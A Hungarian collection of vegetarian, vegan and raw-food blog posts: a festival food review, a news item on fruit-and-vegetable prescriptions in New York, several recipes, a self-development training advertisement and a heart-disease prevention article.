Idén is ellátogattunk az augusztus huszadikai programok keretén belül az Magyar Ízek Utcájába. Az utca jó hosszú volt, de a tavalyihoz képest - szerintem - kevesebb árus jött el portékáját bemutatni, árulni. Tavalyi kedvencem - a flódnis "sütöde" viszont jelen volt. Mivel előző évben nagyon ízlett ez a zsidó konyha remeke, így idén is megkóstoltam. Vagy az én ízérzékem változott, vagy a recept, vagy mert nem volt langyos sem, csak hideg a sütemény, de ebben az évben nem jött be annyira. Szerintem az állaga sem volt olyan sikeres, mint tavaly. Ha már édesség... idén is voltak aszalt gyümölcsökből készült édességek standjai. Idén is kihagytam a vásárlását. Tartok tőle, hogy annyira édes lenne, hogy nem tudnék 5 dkg-ot sem elfogyasztani. Máskülönben, ha lenne ingyenes falat kóstolóként, kipróbálnám és lehet, hogy tévednék. Marketing kérdés is - legalább is a cégnél az lehetne. Ezt különben tavaly is így gondoltam. Persze, megértem, ha nincs erre financiális kapacitás náluk. S igazából még aprócska kérdéseim voltak velük kapcsolatban, azonkívül, hogy a méhecskék szeretettel repkedtek rajtuk, mégpedig az, hogy nem láttam nagyon az összetevők listáját. Vajon cukor hozzáadásával készülnek? És a színezékeket hogy oldják meg? Na és a zselés állagúakat miből készítik? (Nem akadékoskodok, ezek felmerültek benne, mint esetleges vásárlóban.) De volt egy kisebb stand, ahol egyszerű portékát árultak: fűszeres tökmagot. Fokhagymás, paprikás, csilis, olívaolajas és kókuszos-fahéjas (ez utóbbi az édesszájúak számára) ízekben. A kedves árusok nem sajnálták megkóstoltatni a néppel a tökmagokat. Ez volt az igazi reklámfogás. Minket jól megcélzott.:) Férjemnek alig kellett unszolnia, vettünk is két fajtát. Mire bejártuk az "utcát" jól megrágcsáltuk a kis zacskó tökmagokat. S hogy ezek a magyarok mit ki nem találnak egy gasztro-fesztivál alkalmával! Tudniillik azt, hogy fatüzelésű sparhelten sütötték a tésztát (talán kenyérlángos vagy valamilyen lepény volt?). Ötletesnek tartottam, s ha húsevő vagyok, bizonyára megtalálom a számomra ízletes falatokat itt, akkor is, ha a legolcsóbb termékük 900 forintnál kezdődött. A másik, ami számomra tetszett, egy helyen hatalmas méretű pogácsákat árultak. (300HUF) Szépek és nagyok voltak a pogik. Sajnos csak két fajta volt (legalább is, amikor ott jártunk): tepertős és néhány sajtos. Na hát mondanom sem kell, hogy a tepertős pogikat egész életemben nem kedveltem. Ha lett volna magvas - mondjuk napraforgó, tökmag, szezámmag trióval, vagy paprikás (igen, én már korábban készítettem ilyet, mikor még nem blogoltam), akkor talán veszünk egyet, bár méretét tekintve négy embernek is elég lett volna egy. Pékáruk kapcsán megemlítem még az olívabogyós kenyérkét, ami jópofa volt. Árat nem láttam kiírva (attól még lehetett), és a megkóstolást is kihagytuk. Viszont egy helyen (nem tudom, hogy ugyanitt-e), szintén kóstolót osztogattak - paradicsomos - csilis kenyér falatkákat. A kis falat kenyérke jó fűszeres volt. Mindkettővel - olívás és aszalt paradicsomos - már én is próbálkoztam, bár ez szintén nem található (még) a blogomon, pedig sikeres volt. (Olyan gyorsan elfogyott, hogy nem tudtam lefotózni.) Azért meg kell hagyni, a vegákra is gondoltak az egyik "főttétel" pultnál. Valami húsféléket sütöttek és árultak, s nagy örömömre az alábbi három salátafélét is választhatta az arra járó. Zárásként pedig jöjjön néhány kenyérről, péktermékről készült kép, ha már augusztus 20. ennek is az ünnepe.
Zöldséget, gyümölcsöt receptre
Az orvosok New Yorkban újabban gyümölcsöt és zöldséget írnak fel túlsúlyos és elhízott betegeiknek. Linda Gibbs alpolgármester kezdeményezte, hogy a kockázati csoportba eső családok könnyebben hozzájuthassanak az egészséges ételekhez. A programban a túlsúlyos és elhízott pácienseknek egészség-kuponokat kapnak, amiket helyi piacokon válthatnak be. Az egészség-kuponok a GrowNYC program részét képezik, amely helyi terményeket juttat el alacsony jövedelmű családokhoz. A kuponokat 140 new yorki piacon fogadják el. A program egész családoknak és közösségeknek is segít egyszerre. A páciensek napi 1 dollárnyi kupont kapnak, minden családtag számára, külön-külön, legalább 4 hónapos időtartamra. Havonta kell megújítaniuk a ,,receptet a kórházukban, ahol a súlyukat és testtömeg indexüket is ellenőrzik, valamint táplálkozási tanácsokat kapnak. A Lincoln Medical Center (Bronx) és a Harlem Hospital Center a két úttörő kórház. A Lincoln vezető gyermekgyógyásza, Dr. Shefali Khanna szerint nem csak egészségesebb étkezésre fognak nevelni, hanem a jövőbe fektetnek be. Remélik, hogy a résztvevő gyerekek egészséges testsúlyú felnőtté cseperednek. Igen, jól olvassátok nem húst, nem tejtermékeket, nem laboratóriumokban kreált étrend kiegészítőket és nem gyógyszereket, hanem zöldséget, gyümölcsöt írnak fel receptre az orvosok. Ha ez a nagyszerű kezdeményezés elterjed, az emberek újra megismerik a zöldségek, gyümölcsök, természetes ízét, gyógyhatását, kialakulhat egy igényesebb, egészségesebb gasztronómiai kultúra. Az talán majd akkora nyomást helyez a többnyire ehetetlen hulladékot gyártó élelmiszeriparra, hogy elkerülhetetlenné válik az átalakulása. Ha az orvostudomány atyjaként tisztelt Hippokratész megtekintené ezeket a new yorki recepteket, elégedett lenne, hisz ő már több mint kétezer éve megmondta: ,,Táplálékod legyen egyetlen orvosságod! A kezdeményezés Magyarországon is időszerű lenne, mivel egy 2009-es felmérés szerint a felnőttkorú magyar lakosság 61,8% túlsúlyos, 27%-a elhízott. Forrás
Mentás- citromos fogyasztó ital
Áldás! Jó látni milyen sokan vagyunk már, akik törekszünk a jóra, kívül- belül :) Hiszem, ha elkezdünk változtatni csak egy apróságon is, az maga után von még ezernyi változást. Ha belsőnkön alakítunk a külvilágban tükröződik... Egyre többen mondják, hogy olyan más vagyok, mint aki a holdon él! Na én ezen csak nevetek, örülök neki, és igen meg van az én saját kis világom, mikrokozmoszom. Nekem bizony jobb érzés rózsaszín szemüvegen át, szívből élve nézelődni, mint realitás talaján mozogva, elme által korlátozva. Na igen próbáltam azt is, és akkor azt hittem az a tuti, hogy mennyire jó, hogy mindent meg tudok magyarázni és reálisan látni, értékelni, de ma már tudom az eleme, a gondolatok, sokszor elvisznek, és legtöbbször nem a jó irányba. Szóval csak szívvel- lélekkel! Egy receptet akartam csak megosztani, de most ez is kijött:) Imádom a zöld turmixokat, tudom sokan vannak ezzel így, de most van egy új nyári kedvenc ami szuper fogyasztó, lúgosító, hidratáló, szépítő, élénkítő, frissítő és..... még sorolhatnám. Szóval távozz narancsbőr és egyebek :D A legjobb hűvösen jegesen! Mentás- citromos fogyasztó ital: 2-3 marék zöld levél, ami lehet pl., spenót, mángold, lucerna, céklalevél, sárgarépa zöldje, porcsin, tyúkhúr, disznó paréj, saláta, pici parlagfű... 1 cirtom meghámozva fél csokor menta víz Turmixoljuk, majd leszűrjük. Vettem mosózsákot és azt használom szűrésre, így jól ki tudom nyomkodni a levét. A megmaradó zöld pépet aszalóban ki lehet szárítani és télre eltenni, vagy mehet vissza a körforgásba, és irány a komposztáló. Ez a zöld lötyi, általában végigkíséri a napomat. Akár befőttes üvegbe is önthetjük és vihetjük magunkkal a kocsiban, buszon, munkahelyre, strandra....egészségetekre:)
Az önmegvalósítás művészete - út a boldogsághoz
2013. június 15. Gitta nyersétel blogja
Szerintem ez az a téma, ami mindenkit érdekel. Én ott leszek ezen az inspiráló tréningen, és abban is biztos vagyok, hogy kihat egész további életemre. Gyere el te is, tapasztaljuk meg együtt, hogyan lépjük át belső korlátainkat! Természetesen nyers ételekkel várjuk a résztvevőket, ebéd, és némi rágcsálnivaló, turmix, és tisztított víz, amit a Nyersétel Akadémia biztosít. Ki az, aki nem szeretné tudni, hogy milyen út vezet önmagunk kiteljesedéséhez és a teljes boldogsághoz? Van egyáltalán ilyen út? Van módszer, ami mindenki számára használható? Hogyan oldhatnánk meg magánéleti, vagy munkahelyi problémáinkat? A boldogságot mindannyian kívülről várjuk, hogy történjen velünk valami, amitől boldogok leszünk. A kulcs pedig éppen itt van! Meg kell tanulnunk felfedezni a boldogságot önmagunkban, ott, mélyen, legbelül. Ebben segít ez az egy napos tréning, amit a Nyersétel Akadémián tart egy kitűnő szakember, Heller Balázs. Heller Balázs Fedezd fel az öntudatra ébredés, az önmegvalósítás útját belső szabadságod felé! Heller Balázs (http://www.balazsheller.com/), Jóga Asana Európa bajnok, és Life Coach három fogásos nyers vegán ebéddel egybekötött hét órás személyiség-fejlesztő tréningjén! Helyszín: Budapest, Nyersétel Akadémia (http://www.nyersetelakademia.hu/), Budapest, XIII. Tátra u. 11. Időpont: 2013. július 13. 10.00-18.00 óra. 1. KIHEZ SZÓL AZ ELŐADÁS? Ez az előadás a LELKEDhez szól, hogy képes legyél ÁTLÉPNI a materiális világunk korlátain, hogy a boldogságot már ne a külvilágban, de ott mélyen legbelül, önmagadban FEDEZD FEL. Az előadáson elhangzó inspiratív gondolatok, tanítások és gyakorlati útmutatások SZEMBESÍTENEK önvalóddal, hogy az öntudatra ébredéssel a korlátlan belső szabadságod fellegébe SZÁRNYALJ. Sok szeretettel várunk minden kedves érdeklődőt korhatár nélkül, hogy megtedd az első lépést a változáshoz, hogy SZEMBESÜLJ és MEGOLDÁST TALÁLJ az élet adta nehézségekre, legyen az a párkapcsolat, család, karrier, betegség, belső korlátaink, félelmeink, bizonytalanság, kilátástalanság, útkeresés vagy pusztán önismeret. Az önmegvalósítás művészete az ÉLET művészete, melynek alkotója kizárólag TE lehetsz! Alkossunk együtt! Ahhoz, hogy megtudd mi vagy, előbb fel kell fedezned, mi nem vagy. És, hogy megtudd mi nem vagy, előbb gondosan figyelned kell magad, visszautasítva mindent, ami nem jár szükségszerűen együtt azzal az alapvető ténnyel, hogy: vagyok. Minél világosabban megérted, hogy az elme szintjén csak tagadó kifejezésekkel írhatod le magad, annál gyorsabban érsz a keresés végére és ismered fel, hogy lényed korlátok nélküli. - Sri Nisargadatta Maharaj 2. VÉLEMÉNYEK, TAPASZTALATOK Egy nagyon érdekes előadás, hogy megtanuld értékelni az élet szépségét. Mindenkinek ajánlom ezt az előadást, aki a Belső Béke útjára kíván lépni. Hatékony előadás, mely szembesít az élet értelmével, értékeiddel. Szívből ajánlom mindenkinek Balázs segített felfedezni értékrendszeremet, melynek köszönhetően képessé váltam kapcsolatba lépni a lelkemmel, az igaz énemmel . Amennyiben keresed helyed e világban, ne hagyd ki ezt az előadást. 3. AZ ELŐADÓRÓL Heller Balázs (http://www.balazsheller.com/) legfőbb hivatásának az emberek inspirálását, motiválását tekinti előadásain, írásain, jóga óráin, meditációin, jógatáborain keresztül. Balázs 7 évesen kezdett el szertornázni, amit egészen 13 évig profi szinten űzött. Többszörös országos ifjúsági bajnokként és magyar válogatottként sok helyen járt a világban, majd az USA-ban, Franciaországban edzősködött. A torna után egyenes út vezetett a jóga világába. 2009-ben Dublinban elnyerte a Jóga Asana Európa bajnoki címet, majd családjával Máltára költözött, ahol létrehozta holisztikus jóga-fitnessz központját, ahol mind a mai napig privát és csoportos önismereti tréningeket, a vegán táplálkozásról szóló előadásokat, jóga és fitness órákat tart. Balázs emellett rendszeresen tart jóga életmód táborokat, amely nemcsak a jógáról, de a személyiségfejlesztésről, a vegán életmódról és az öntudatra ébredésről is szól. 2009 óta life coachként (életvezetési tanácsadóként) dolgozik. 4. JELENTKEZÉS ÉS FOGLALÁS A tréning maximum létszáma: 20 fő. Jegyár: 11 900Ft, ami tartalmazza az ebéd és az uzsonna árát. A tréningen való helyfoglalás és részvétel regisztrációhoz kötött, a jelentkezést a következő címre várjuk: trening.regisztracio@yahoo.com
Mentás almaturmix
Gyors és finom frissítő. Mindenféle nehézség nélkül egy különleges ízvilágot kapunk, ami nem csak "after eight", hanem "before eight a.m." :) Magyarul nem csak este, de reggel is egyaránt fogyasztható. A recept: Hozzávalók: - 1 csokor menta levelei - 2 alma - 1,5 dl víz - turmixgép (min. 500 watt) Elkészítés: Az almát apróra vágjuk és a turmixgépbe tesszük. A mentát alaposan megmossuk, majd az almák tetejére szedegetjük a leveleit. Kevés vizet öntünk a turmixgépbe és már mehet is a turmixolás egészen addig, míg jó sűrű pépet nem kapunk. Poharakba vagy bögrékbe töltjük és elfogyasztjuk!:)
A szívbetegségről - I. rész
Sue sohasem aggodalmaskodott túl sokat a szívbetegség miatt. Igaz, édesapja 45 éves korában szívroham következtében halt meg, de azt mindenki tudja, hogy a női nemi hormonok védenek a szív megbetegedéseitől, legalábbis addig, amíg a klimax be nem következik. Egy éjszaka azonban Sue rádöbbent a valóságra. Fiatalabb húga 40 éves korában meghalt első szívrohamában, még a változás kora előtt. Sue hirtelen szembetalálta magát azzal, amitől legbelül mindig is félt: őt is érheti szívroham. Szinte minden amerikai ismer valakit, aki szívbetegségben halt meg. Csakúgy, mint Sue, elveszíthetjük közeli hozzátartozónkat e miatt a rettegett kór miatt. Talán vannak szomszédaink, barátaink, munkatársaink, akiket szívbetegség ragadott el. E gyilkos uralmának eredményeként közülünk többen - legalábbis alkalmanként -felteszik a kérdést: ,,Lehet, hogy én leszek a következő?" Az efféle aggodalmak jogosak. A szívbetegség az iparosodott országokban az első számú gyilkos. A népszerű téveszmékkel ellentétben a szívbetegség nem csak a férfiak betegsége. Amerikában a szívbetegség a vezető halálozási ok férfiak és nők körében egyaránt. Mindannak ellenére, amit az orvostudomány tud arról, hogyan előzhető meg ez a betegség, a legfrissebb statisztikák azt mutatják, hogy egyedül az Egyesült Államokban 1994-ben több mint 954 00C ember halt meg szív- és érrendszeri betegségekben, míg 1992-ben 925 000-en. Minden 33. másodpercben egy amerikai kardiovaszkuláris betegségben hal meg. 1900 óta mindig - 1918-at kivéve - a kardiovaszkuláris betegség volt az Egyesült Államokban az első számú gyilkos. Amikor egy repülőgép lezuhan az USA-ban, és százak halnak meg, az újságok napokig címoldalon foglalkoznak az esettel. Nagyon alapos elemzést végeznek, közhírré teszik a szerencsétlenség lehetséges okát és azt, hogyan lehetett volna megelőzni. Vegyük fontolóra, hogy hozzávetőlegesen kétezer-hatszáz haláleset fordul elő naponta az Egyesült Államokban csak kardiovaszkuláris betegségtől, s közülük sok olyan hirtelen következik be, mint egy légi katasztrófa. Ez több, mint tíz Jumbo-katasztrófa naponta. E halálesetek még csak nem is jelennek meg a hírek között, kivéve, ha egy híres személy hal meg szívroham következtében. Ha a betegséget egyáltalán megemlítik, azt is csak úgy, mintha elkerülhetetlenül következett volna be. Ez a halálok több figyelmet érdemelne. Szomorú, de a halálesetek e rémisztő betegségnek nem egyedüli negatív következményei. A kb. 258 milliós amerikai lakosságból 57 millió embernek ilyen jellegű betegsége van. Amerikának évente a szív- és érrendszeri betegségek döbbenetes módon 259,1 milliárd dollárjába kerülnek, ami nemcsak az orvosi és sebészeti beavatkozásokat és kezeléseket tartalmazza, hanem a munkaerő-kiesést is. Ha valaki történetesen átél egy agyvérzést, ennek költségei egy átlagos életkorú ember esetében az egészségbiztosítási számlákon és kereseti kiesésben 103 576 dollárt tesznek ki. Mennyivel jobb megelőzni az agyvérzést vagy szívrohamot, mint fizetni valakinek, és mégis szenvedni a betegségtől és az azt biztosan követő gyengébb életminőségtől! Nem csoda, hogy Clyde Yancy dr, az Amerikai Szívtársaság dallasi divíziójának elnöke, a dallasi Texas South-western Medical Center egyetemén kutató kardiológus nemrég azt mondta: ,,Nem számít, hol tart valaki felnőtté válása folyamatában, középkorú vagy öreg: a szív szempontjából egészséges életmód vállalása a leghatékonyabb dolog, amit azonnal megtehet." Nemcsak a leghatékonyabb, de igen fontos is, sőt valószínűleg életmentő és minden bizonnyal élettartam-növelő! Hogyan lehet a szívrohamok számát csökkenteni? Mit tehet az ember, hogy a szívroham esélyét csökkentse? Dr. Gyárfás Iván, az Egészségügyi Világszervezet kardiovaszkuláris betegségmegelőző programjának vezetője úgy magyarázza, hogy a megelőzésre vonatkozó lépések, rendelkezések jelentős számú embert meg tudnának menteni az idő előtti, korai haláltól: ,,Világszerte évente körülbelül 12 millió ember hal meg szívproblémától, de több mint a fele életben maradhatna, ha jobb megelőzési programok működnének." A jobb megelőzési programok kb. 50%-kal vissza tudnák szorítani a szívbetegségből eredő (főleg a szívkoszorúér megbetegedéséből származó) halálozások számát, sőt a bizonyítékok azt mutatják, hogy optimális prevenciós programokkal akár kilencven százalékkal is vissza lehetne szorítani az esetek számát. Röviden: noha a szívbetegség messze a legfőbb halálozási ok Amerikában, nem kell annak lennie. Tíz szívrohamból kilenc megelőzhető! A bejegyzés alapjául a "Döntő bizonyíték" c. könyv szolgált.
Eszem húst, csak nem állatokét
Avagy kik azok a vegánok, és miért nem hagynak békén? - kérdezi Steiner Kristóf, aztán megmagyarázza.
Új magyar gyümölcslé érkezik a hiperek polcaira
Új gyümölcslevekkel lép a kiskereskedelmi piacra Garden Csoport, a teljes egészében magyar gyártású gyümölcslevek sem adalék-, sem tartósítószert nem tartalmaznak és hiperekben is kaphatóak lesznek. A gyártó a kiskőrösi régióban integrált zöldberuházást hoz létre a gyártásra.
Paprikás burgonya szejtánnal
2013. május 2. Govinda Vegetáriánus konyhája
Az egyik legismertebb magyar étel elkészíthető vegetáriánus módon is.
Sült csicseriborsó
Nyammmmm..... Jobb lett, mint vártam, mint számítottam rá. Nagyobb adagot készítettem, először is azért, hogy magában is fogyaszthassuk, másodszor pedig krumplival párosítottam, és brassóit kreáltam belőle, de erről majd bővebben a következő bejegyzésben írok. Szóval a csicseriborsó most már talán jobban kezd elterjedni a magyar konyhában, de tény, hogy még mindig nem sok étterem étlapján találkozunk vele. Pedig nagyszerű táplálék. Ezt is nagyobb mennyiségben vettem, anyuval felezve, de nem aggódok, gyorsan el fog fogyni, főleg, ha sütőbe teszem és ilyen ízvilággal készítem el. Vetési ideje különben most van, áprilisban, és nem hagyhatom ki, hogy bizonyos területeken bagolyborsónak, csücsörborsónak nevezik. Babbal szemben előnye, hogy nem zsizsikesedik. Tápanyagtartalom tekintetében magas fehérje forrás, ezért is a vegák egyik kedvelt eledele. B1- és B6-vitamint, folsavat, sok magnéziumot, vasat és cinket tartalmaz. Babhoz vagy lencséhez viszonyítva jobb az emészthetősége. Rendszeres fogyasztása esetén csökkenhet a vér koleszterinszintje. Pektintartalmának köszönhetően pedig gátolja a gyors vércukorszint növekedést, ezért ajánlják cukorbetegeknek is. Ha belegondolunk az emberek nagy része koleszterin, vagy cukor, rosszabb esetben mindkettő problémával küzd. Itt van ez a csodás növény, és még sincs eléggé elterjedve a magyar háztartásokban. Remélem, következő receptem kedvet ad hozzá, hogy változtassunk a megszokott étkezésünkön, és igenis beiktassuk a csicseriborsót is az étrendünkbe. A recept: Hozzávalók: 1,5 bögre csicseriborsó víz ételízesítő babérlevél piros paprikakrém 1 teáskanál mustár 2-3 gerezd fokhagyma majoránna őrölt köménymag olaj sütőpapír papírtörlő Elkészítés: Egy éjszakára, de legalább 8 órára beáztatjuk az alaposan megmosott csicseriborsót (kivéve, ha konzervet használunk). Másnap pár darab babérlevéllel és ételízesítővel megfőzzük. Amíg fő, összeállítjuk az olajos-fűszeres szószt. A fokhagymákat összepréseljük, és kb. 3-4 evőkanál olajjal összekeverjük. Teszünk hozzá majoránnát és őrölt köménymagot, valamint a paprikakrémből is egy keveset. Az egészet összekeverjük jó alaposan. Amikor a csicseriborsó megfőtt, ha maradt rajta lé, leszűrjük és a fűszeres olajjal a borsószemeket összekeverjük. Sütőpapíros tepsiben kb. 40-45 percig sütjük. Kicsit roppanós, ropogós lesz, amikor a szemek átsülnek. Sütés után papírtörlővel felitatjuk az olajat és tálaljuk. Magában is elfogyaszthatjuk, de köretként is szolgálhat.
Bundázott Gabona Sonka
2013. március 28. Fittanyuka Blog
Húsvét apropóján előtérbe kerülnek a sonkák és a sonka utánzatok. Habár nem szeretem az utánzat és a helyettesítő szavakat használni, mert tapasztalatból tudom, hogy aki nem fogyaszt húst, nem azért veszi a gabona sonkát, mert kívánja a sonkát, hanem inkább a szokások miatt. Bizonyos ízek emlékeket idéznek, a sonka füstölt illatától a húsvét jut eszünkbe többek között. Ezzel a gömböccel szeretem időnként feldobni az ételek ízét, az enyhén füstös íze, jellegzetes magyaros ízvilágot varázsol az ételből. Kedvenc receptem belőle, a sárgaborsó vagy csicseri lisztből készült bundában sütött verzió. Már korábban elkészítettük az egyik főzőtanfolyamon, nagyon finom, az ünnepi, de akár a hétköznapi menü szereplője lehet. Hozzávalók: 1-2 db 200 g-os gabona gömböc, más néven gabona sonka 200 g sárgaborsó liszt vagy csicseriborsó liszt himalaya só, őrölt fehér vagy fekete bors ízlés szerint víz kókusz olaj a sütéshez A gabona sonkát vékony szeletekre vágjuk. A sárgaborsó liszt egyik felét ízlés szerint fűszerezzük, majd annyi vízzel hígítjuk, hogy palacsinta tészta vastagságú masszát kapjunk. Óvatosan öntsük hozzá a vizet, folyamatos keverés mellett, vigyázva, hogy ne maradjon csomós. Kétfázisú panírozást végzünk. Vagyis a szeleteket először megforgatjuk a sima sárgaborsó lisztben, majd belemártjuk a palacsinta tészta vastagságú masszába és a forró olajban aranybarnára sütjük. Fittanyuka
Délmagyarország - Gasztro Magazin
2013. március 21. Fittanyuka Blog
Engedjétek meg, hogy ne csak a receptjeimet oszthassam meg veletek, hanem a kisebb sikerélményeimet is:)! Köszönöm a felkérést a Délmagyarország - Gasztro magazin részéről, hogy közöltek rólam és a hitvallásomról egy cikket, néhány receptemmel együtt, a húsvéti ételek és természetesen a lúgosítás, egészség jegyében. Az újság, a kiegészítő magazinnal március 20-án jelent meg és nemcsak Csongrád, hanem Győr - Moson - Sopron megyében is kapható. A következő szám két hét múlva fog megjelenni, amelyben szintén szerepelni fog néhány receptem. A téma a tavaszi megújulás, tisztulás lesz. Fittanyuka
Tavaszi Székelykáposzta
2013. március 18. Fittanyuka Blog
Ez a recept újfent egy erdélyi recept, amelyet anyukám reformált át, a fűszerezés maradt és a tavaszi ízhatást a zöldfűszerektől kapta! Használhatunk tetszőleges zöldfűszert, nekem most a választásom a kapora esett. Bármelyik évszakban fogyaszthatjuk, de tény, hogy ez inkább egy télies recept. Az időjárás újra hidegre fordult tavasz ellenére és ilyenkor visszanyúlunk a táplálóbb ételekhez. Hozzávalók: ( 4 fő részére) 750 g Savanyú, vágott káposzta, természetes savanyítású, nem ecetes! 2 fej vöröshagyma 2 kk édesnemes őrölt piros paprika 1 kk őrölt kömény 1 kk himalaya só 1/2 kk őrölt fekete bors 1/2 kk morzsolt borsika fű friss kapor apróra vágva 1 db piros kaliforniai paprika 3 cikk fokhagyma 2 evőkanál kókusz olaj 8 evőkanál barna rizs előre megfőzve 250 g szejtán : Recept! A káposztát előre megfőzzük annyi vízben amennyi ellepi, éppen roppanósra. Közben a hagymát, paprikát apró kockára vágjuk és a kókusz olajon puhára pároljuk, gyakorlatilag készítünk egy pörkölt alapot, mint a hagyományos verziónál, fűszerezzük a piros paprikával, sóval, borssal, köménnyel és hozzáadjuk a felkockázott szejtánt, káposztát, főzött barna rizst, hozzáadjuk a préselt fokhagymát is. Az egészet fedő alatt 5-10 perc alatt összefőzzük. Növényi tejföllel, vagy növényi tejszínnel tálaljuk! Fittanyuka
Székelykáposzta nyersen
2013. március 13. Gitta nyersétel blogja
Néhány hónapja készítünk nyers székelykáposztát a Nyersétel Akadémián. Aki rendelt már a Vegafood-tól, az ismeri, tudja, hogy fantasztikusan finom, igazi harmonikus, magyaros ízek, ropogós káposzta, krémes környezetben. (a savanyú káposzta rendkívül egészséges, jótékony hatással van a bélrendszerre, magas a C vitamint tartalma, segíti az emésztést, erősíti az immunrendszert, stb... de mindezt csak nyersen! Főzéssel az értékes tápanyagok nagy része elbomlik, megsemmisül. Ki kell próbálni nyersen. Finom!) Több helyen szerepel a fotója is, mások bejegyzéseiben, cikkekben, facebook-on... és nagyon sokan kérik a receptjét. Hát íme, úgy gondoltam, hogy ez annyira finom, egészséges, hogy nem tartom meg magamnak. Készítsétek el otthon ti is a nyers, vegán változatát. A székelykáposzta nevének eredetéről több történet is kering, a nyers-vegán székelykáposztáról én ezt tudom írni (hátha még bevonul ez is a történelembe) A Nyersétel Akadémián Peti, a szakács megkérdezte egyszer: Annyira nagy sikere van a korhely levesnek, és a rakott savanyú káposztának. Ki kellene találni még valamilyen ételt savanyú káposztából, valami finomat. Erre a másik szakács, István: Csináljunk székelykáposztát! Nyers pörkölt alapot hagymásan, paprikásan, mandulával helyettesítjük a tejfölt, holnap kipróbáljuk! És másnap megszületett a nyers vegán székelykáposzta, ami azóta is az egyik legnagyobb kedvenc, az M1 Családbarát magazinjában, a Nyersétel Akadémia sajtótájékoztatóján, tanfolyamon, és hétköznap ebédre a Vegafood kiszállításában találkozhattatok vele. Csak igazi, magában savanyított káposztát használjunk, mert az ecetes, tartósított savanyú káposzta nem az igazi! Székelykáposzta nyersen 1,5 kg savanyú káposzta kinyomkodva 15 dkg paradió 10 dkg mandula (beáztatva, héját lehúzva) 1-1 darab tv és kápia paprika 10 dkg póréhagyma, vagy lilahagyma 2-3 fokhagyma 2-3 darab paradicsom, só, bors, magyaros fűszerkeverék, kömény, koriander A paradió és a mandula illik legjobban ehhez az ételhez. De használhatunk bármilyen olajos magot, diófélét, pl. napraforgó mag, kesudió, dió, stb...) A káposztát felvágjuk, félretesszük.(a kinyomkodott levét meg lehet inni, finom) A zöldségeket simára turmixoljuk, majd beletesszük a magokat és a fűszereket. Összekeverjük a káposztával. A tetejére magtejfölt teszünk: Magtejföl Hozzávalók: 15 dkg áztatott napraforgó mag+kesudió vegyesen citromlé, só, bors, 2-3 csepp stévia, vagy más édesítőszer víz A hozzávalókból tejfölszerűt turmixolunk. A magtejfölt a káposztára kanalazzuk, és petrezselyemmel díszítjük. Még több nyers recept savanyú káposztával: - ITT -
Céklakrémes penne pirított mákkal + a második hét cukor nélkül
2013. február 17. Zizi kalandjai
A cukormentes kihívás második hete nagyon könnyen telt. Néha eszünkbe jut a csoki és az édesség, főleg akkor, ha valamilyen nyálcsorgató képet látunk, de nem sóvárgunk különösebben az édesség után. Ha egy sós étel után mégis édesre vágyunk, akkor néhány szem mazsolával orvosoljuk a problémát. Kiderült, hogy a sütést sem kell kizárni teljesen az életünkből, ugyanis sikerült egy mennyei banánkenyeret sütnöm (recept jön!), amiben a banánon kívül nincsen más édesítőszer, mégis finom és édeskés az íze. Sőt! Így, hogy nem eszünk cukrot, számunkra az íze nem édeskés volt, hanem édes. Tegnap pedig hagyományos magyar palacsintát sütöttem rizstejjel és cukormentes sárgabarack-, valamint szilvalekvárt kentünk bele. A palacsintába amúgy sem teszek cukrot, a rizstej enyhén megédesítette és pont kellemes volt a savanykás lekvárokkal. Nagyon sokan beszálltatok a cukormentes kihívásba. Folyamatosan frissítem az első heti beszámolómat az újonnan érkezett linkekkel (aki ír blogot, továbbra is küldje el nekem emailben a heti beszámoló linkjét). Vegasztrománia is kihirdette Facebook oldalán, hogy nagyböjt idejére, egészen húsvétig lemond a cukorról, a csokiról és egyéb édességekről. Hajrá, Anna! A szabályok továbbra is ugyanazok: aki a nyereményjátékban is részt kíván venni, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén (csak az kerül bele a kalapba, aki mind a négy heti beszámolóhoz ír néhány sort vagy blogbejegyzést). Aki pedig használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk! Akik a második cukormentes hétről beszámoltak: - Orsi - Wannabe Chef Most pedig jöjjön ez a nagyon vörös, látványra is különleges, és ízorgiát tartogató tésztás étel... Céklakrémes penne pirított mákkal Hozzávalók 2 főre: - 200 g penne tészta - 3 közepes cékla, meghámozva, felkockázva - 3-4 gerezd fokhagyma, meghámozva, felaprítva - 2 ág friss vagy 1 teáskanál szárított kakukkfű - 4 evőkanál olívaolaj - 1 evőkanál balzsamecet - 1/2 bögre zöldségalaplé - 1/4 bögre tejszín (vagy zabtejszín) - 60 g parmezán (vagy növényi sajt), reszelve - 1 evőkanál mák - só, bors (A recepthez használt bögre 250 ml-es.) Egy tálban keverjük össze a felkockázott céklát két evőkanál olívaolajjal, a kakukkfűvel és ízlés szerint sóval, borssal. Öntsük egy tepsibe és 180 fokon süssük puhára 30-40 perc alatt. Az utolsó 10 percben szórjuk rá az aprított fokhagymát (azért a végén, hogy ne égessük meg). A megsült fokhagymás céklát tegyük konyhai robotgépbe, adjuk hozzá a balzsamecetet, még két evőkanál olívaolajat, a reszelt parmezán felét és dolgoztassuk a gépet, amíg teljesen sima, pürés állagú lesz. Ekkor öntsük egy lábasba és adjuk hozzá az alaplevet, a tejszínt és a maradék parmezánt. Jól keverjük el, ha szükséges, még sózzuk, borsozzuk és melegítsük össze 6-8 perc alatt. Közben főzzük meg sós vízben a pennét al dente (fogkemény) állagúra, szűrjük le és tegyük félre. Egy száraz serpenyőben közepes láng felett pedig pirítsuk meg a mákot 2-3 perc alatt. A megfőtt tésztát keverjük össze a céklakrémes szósszal és tálaljuk azonnal. Szórjuk meg a pirított mákkal, friss kakukkfűvel és egy kevés parmezánnal. Jó étvágyat!
Helyzetjelentés 2013. február:-)
